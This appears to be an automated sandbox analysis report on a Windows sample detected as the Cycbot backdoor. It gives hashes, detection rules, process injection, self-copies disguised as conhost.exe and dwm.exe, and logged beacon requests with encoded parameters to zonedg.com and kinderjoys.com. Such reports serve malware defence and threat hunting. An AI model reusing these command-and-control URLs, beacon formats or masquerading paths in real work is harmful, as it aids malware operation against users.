Analysis
max time kernel: 140s
max time network: 122s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 18/12/2024, 22:45 UTC
Static task: static1
Behavioral task: behavioral1
Sample: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Resource: win7-20240903-en
General
Target: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Size: 186KB
MD5: fd67bacae904767f1a03549b40df8c2b
SHA1: 19f9aee4123950ce0479248eebfb664dee965880
SHA256: 554b6d86320bcde0116a2295ea88d08204a8954bde3a309292c1899ac089be89
SHA512: 02bbb8b80023cb1442896e76121741419035d5c8ddecf8268dc8d1edf5271c0e9f3b22a4cb5dfdf5aae670e74018c948b62255faa37e766ee01a55f15dc7d35a
SSDEEP: 3072:AHoD8YbYxBB7n+mD1//Csd/xcVzwllyVE2PdkPEPiLrz3NOJ99fNF9nC4Oien8pm:2Dxj6Y1nCkysRIuPEUOf9ZnUqICS
Malware Config
Signatures

Cycbot family

Detects Cycbot payload (5 IoCs)
Cycbot is a backdoor and trojan written in C++.
resource                                                                      yara_rule
behavioral1/memory/2616-13-0x0000000000400000-0x000000000044E000-memory.dmp   family_cycbot
behavioral1/memory/2756-14-0x0000000000400000-0x000000000044E000-memory.dmp   family_cycbot
behavioral1/memory/2160-79-0x0000000000400000-0x000000000044E000-memory.dmp   family_cycbot
behavioral1/memory/2756-151-0x0000000000400000-0x000000000044E000-memory.dmp  family_cycbot
behavioral1/memory/2756-188-0x0000000000400000-0x000000000044E000-memory.dmp  family_cycbot
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

resource                                                                      yara_rule
behavioral1/memory/2756-2-0x0000000000400000-0x000000000044E000-memory.dmp    upx
behavioral1/memory/2616-12-0x0000000000400000-0x000000000044E000-memory.dmp   upx
behavioral1/memory/2616-13-0x0000000000400000-0x000000000044E000-memory.dmp   upx
behavioral1/memory/2756-14-0x0000000000400000-0x000000000044E000-memory.dmp   upx
behavioral1/memory/2160-79-0x0000000000400000-0x000000000044E000-memory.dmp   upx
behavioral1/memory/2160-77-0x0000000000400000-0x000000000044E000-memory.dmp   upx
behavioral1/memory/2756-151-0x0000000000400000-0x000000000044E000-memory.dmp  upx
behavioral1/memory/2756-188-0x0000000000400000-0x000000000044E000-memory.dmp  upx
System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Suspicious use of WriteProcessMemory (8 IoCs)
description                        pid   Process                                             procid_target
PID 2756 wrote to memory of 2616   2756  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe  30
PID 2756 wrote to memory of 2616   2756  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe  30
PID 2756 wrote to memory of 2616   2756  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe  30
PID 2756 wrote to memory of 2616   2756  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe  30
PID 2756 wrote to memory of 2160   2756  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe  32
PID 2756 wrote to memory of 2160   2756  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe  32
PID 2756 wrote to memory of 2160   2756  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe  32
PID 2756 wrote to memory of 2160   2756  fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe  32
Processes

C:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 2756

  child: C:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
    command line: C:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\Microsoft\conhost.exe%C:\Users\Admin\AppData\Roaming\Microsoft
    - System Location Discovery: System Language Discovery
    PID: 2616

  child: C:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
    command line: C:\Users\Admin\AppData\Local\Temp\fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe startC:\Users\Admin\AppData\Roaming\dwm.exe%C:\Users\Admin\AppData\Roaming
    - System Location Discovery: System Language Discovery
    PID: 2160
Network
-
Remote address: 8.8.8.8:53
Request: greenherbalteaonline.com IN A
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: milkiwals.com IN A
Response: (empty)
-
Remote address: 8.8.8.8:53
Request: kinderjoys.com IN A
Response: kinderjoys.com IN A 3.33.251.168
          kinderjoys.com IN A 15.197.225.128
-
Remote address: 8.8.8.8:53
Request: zonedg.com IN A
Response: zonedg.com IN A 103.224.212.214
-
Remote address: 8.8.8.8:53
Request: zonedg.com IN A
Response: zonedg.com IN A 103.224.212.214
-
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Remote address: 103.224.212.214:80
Request:
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
Response:
HTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561930.5327036; expires=Sat, 16-Dec-2034 22:45:30 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D&subid1=20241219-0945-303a-9ed3-05fd938bc6df
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
GET http://kinderjoys.com/blog/images/3521.jpg?v52=93&tq=gKZEtzyMv5rJqxG1J42pzMffBvAi0OjbwvgS917W65rJqlLfgPiWW1cg
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Remote address: 3.33.251.168:80
Request:
GET /blog/images/3521.jpg?v52=93&tq=gKZEtzyMv5rJqxG1J42pzMffBvAi0OjbwvgS917W65rJqlLfgPiWW1cg HTTP/1.0
Connection: close
Host: kinderjoys.com
Accept: */*
User-Agent: mozilla/2.0
Response:
HTTP/1.1 404 Not Found
Date: Wed, 18 Dec 2024 22:45:30 GMT
Content-Length: 0
Connection: close
WAFRule: 5
-
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Remote address: 103.224.212.214:80
Request:
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
Response:
HTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561930.7475540; expires=Sat, 16-Dec-2034 22:45:30 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D&subid1=20241219-0945-3053-9aec-87ca61af6097
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Remote address: 103.224.212.214:80
Request:
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
Response:
HTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561930.3748446; expires=Sat, 16-Dec-2034 22:45:30 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D&subid1=20241219-0945-303d-8535-0fbe83ff1805
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Remote address: 103.224.212.214:80
Request:
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
Response:
HTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561930.5182439; expires=Sat, 16-Dec-2034 22:45:30 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D&subid1=20241219-0945-30d2-b509-8f4e9ae7109b
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Remote address: 103.224.212.214:80
Request:
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
Response:
HTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561930.5395299; expires=Sat, 16-Dec-2034 22:45:30 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D&subid1=20241219-0945-307d-a258-fc71d742ad07
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
Remote address: 8.8.8.8:53
Request: www.google.com IN A
Response: www.google.com IN A 172.217.20.164
-
Remote address: 172.217.20.164:80
Request:
GET / HTTP/1.0
Connection: close
Host: www.google.com
Accept: */*
Response:
HTTP/1.0 302 Found
x-hallmonitor-challenge: CgwIr6GNuwYQpbfQ2AMSBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-QQZO9eWMrmhl8dSRrswEMA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Wed, 18 Dec 2024 22:46:07 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-VtuCQTSJuyAkUmwWJ4apqBGq44OyQlTmGF_IuyYN7XzYhnbWzKDHY; expires=Mon, 16-Jun-2025 22:46:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
-
POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Remote address: 103.224.212.214:80
Request:
POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G HTTP/1.1
Host: zonedg.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 0
Connection: close
Response:
HTTP/1.1 302 Found
server: Apache
set-cookie: __tad=1734561970.3006154; expires=Sat, 16-Dec-2034 22:46:10 GMT; Max-Age=315360000
location: http://ww25.zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G&subid1=20241219-0946-10bf-baed-67def1f39522
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
-
Remote address: 172.217.20.164:80
Request:
GET / HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
Response:
HTTP/1.1 302 Found
x-hallmonitor-challenge: CgsIs6GNuwYQlf-CBBIEtdewUw
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-c1cgc53MUobdwEqMksv9ag' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Wed, 18 Dec 2024 22:46:11 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-UX5VwKI1P-RNZN_VQZJkU0apYH8T9aRNVLSLIFcYNvJpWDwEv3zo4; expires=Mon, 16-Jun-2025 22:46:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Connection: close
-
GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGLKhjbsGIjDIGYFe_2OcpQAh-SG_rKAQa8Ve9BVoCxawSvv9sh3Fh-RwAe_Im_fMWWhhgg4jscAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
Remote address: 172.217.20.164:80
Request:
GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGLKhjbsGIjDIGYFe_2OcpQAh-SG_rKAQa8Ve9BVoCxawSvv9sh3Fh-RwAe_Im_fMWWhhgg4jscAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com
Response:
HTTP/1.1 429 Too Many Requests
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3075
X-XSS-Protection: 0
Connection: close
-
Remote address: 103.224.212.214:80
URL: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
Protocol: http
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
585 B 758 B 5 5
HTTP Request: POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
HTTP Response: 302
Remote address: 3.33.251.168:80
URL: http://kinderjoys.com/blog/images/3521.jpg?v52=93&tq=gKZEtzyMv5rJqxG1J42pzMffBvAi0OjbwvgS917W65rJqlLfgPiWW1cg
Protocol: http
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
460 B 385 B 6 6
HTTP Request: GET http://kinderjoys.com/blog/images/3521.jpg?v52=93&tq=gKZEtzyMv5rJqxG1J42pzMffBvAi0OjbwvgS917W65rJqlLfgPiWW1cg
HTTP Response: 404
Remote address: 103.224.212.214:80
URL: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
Protocol: http
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
567 B 700 B 5 4
HTTP Request: POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
HTTP Response: 302
Remote address: 103.224.212.214:80
URL: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
Protocol: http
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
587 B 720 B 5 4
HTTP Request: POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
HTTP Response: 302
Remote address: 103.224.212.214:80
URL: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
Protocol: http
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
593 B 726 B 5 4
HTTP Request: POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
HTTP Response: 302
Remote address: 103.224.212.214:80
URL: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
Protocol: http
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
587 B 720 B 5 4
HTTP Request: POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
HTTP Response: 302
302 B 1.5kB 5 5
HTTP Request: GET http://www.google.com/
HTTP Response: 302
-
Remote address: 103.224.212.214:80
URL: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G
Protocol: http
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
1.0kB 712 B 7 4
HTTP Request: POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfxoX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB846Y%2FC3gWHGT7iirKid%2FYdS5X%2B0alxtygbpb6HvnSAOQij%2B82oYvEaTuLuwd129WxK5VKv975Xlm5G
HTTP Response: 302
516 B 1.5kB 8 5
HTTP Request: GET http://www.google.com/
HTTP Response: 302
-
Remote address: 172.217.20.164:80
URL: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGLKhjbsGIjDIGYFe_2OcpQAh-SG_rKAQa8Ve9BVoCxawSvv9sh3Fh-RwAe_Im_fMWWhhgg4jscAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
Protocol: http
Process: fd67bacae904767f1a03549b40df8c2b_JaffaCakes118.exe
1.2kB 3.7kB 10 8
HTTP Request: GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGLKhjbsGIjDIGYFe_2OcpQAh-SG_rKAQa8Ve9BVoCxawSvv9sh3Fh-RwAe_Im_fMWWhhgg4jscAyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
HTTP Response: 429
-
70 B 143 B 1 1
DNS Request: greenherbalteaonline.com
-
59 B 132 B 1 1
DNS Request: milkiwals.com
-
60 B 92 B 1 1
DNS Request: kinderjoys.com
DNS Response: 3.33.251.168, 15.197.225.128
-
56 B 72 B 1 1
DNS Request: zonedg.com
DNS Response: 103.224.212.214
-
56 B 72 B 1 1
DNS Request: zonedg.com
DNS Response: 103.224.212.214
-
60 B 76 B 1 1
DNS Request: www.google.com
DNS Response: 172.217.20.164
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: 1724eac0f357d168b3d4a0c9f009a6b2
SHA1: b360af81343395995671a9613b38e01c9e7530bb
SHA256: 101de1f701d49131a60a2f6abaf4285bd90a283ca6951025ae7c97867288ee21
SHA512: a46862e51200a36f0caec516e388f95640c50143e9f24364444ef4a38b02da581d655c75807d75efd4a47e190a700a6252fe1907024905e943a6b626e2cae5c6

Filesize: 600B
MD5: a94444cc9a5f0167775c357de3ca901c
SHA1: 60c6ce8718c63ec95bd36715bc045191723877ae
SHA256: 93dd15748168be9c2a28a8af26bf15a7bd16a87342c5f97e94cbc063f075d2f7
SHA512: 44cf44925e533d265bebd7b1a7b996cf6155d0a58ea943a1771b918801b03c6fe74946df6c7a5ee696b7650d768e65651043c5b12bc7996158059e451a40408b

Filesize: 996B
MD5: 2397d777eab64ffbf8454f2aa887d60c
SHA1: 7b1887dc8b1383487fc661562f209c082e2124ca
SHA256: f66997d75fe9804c5ff33159025169c27de1f33a2c4091ff45947c21e11969c0
SHA512: 0aa8af5f7a34561cec9689c33a53778bda1742cb2224d868950a10f655407943fd06e946e9a2d8fb1a71e5d794d95cfe910699d1482bd8bcf95a91f56e34d30c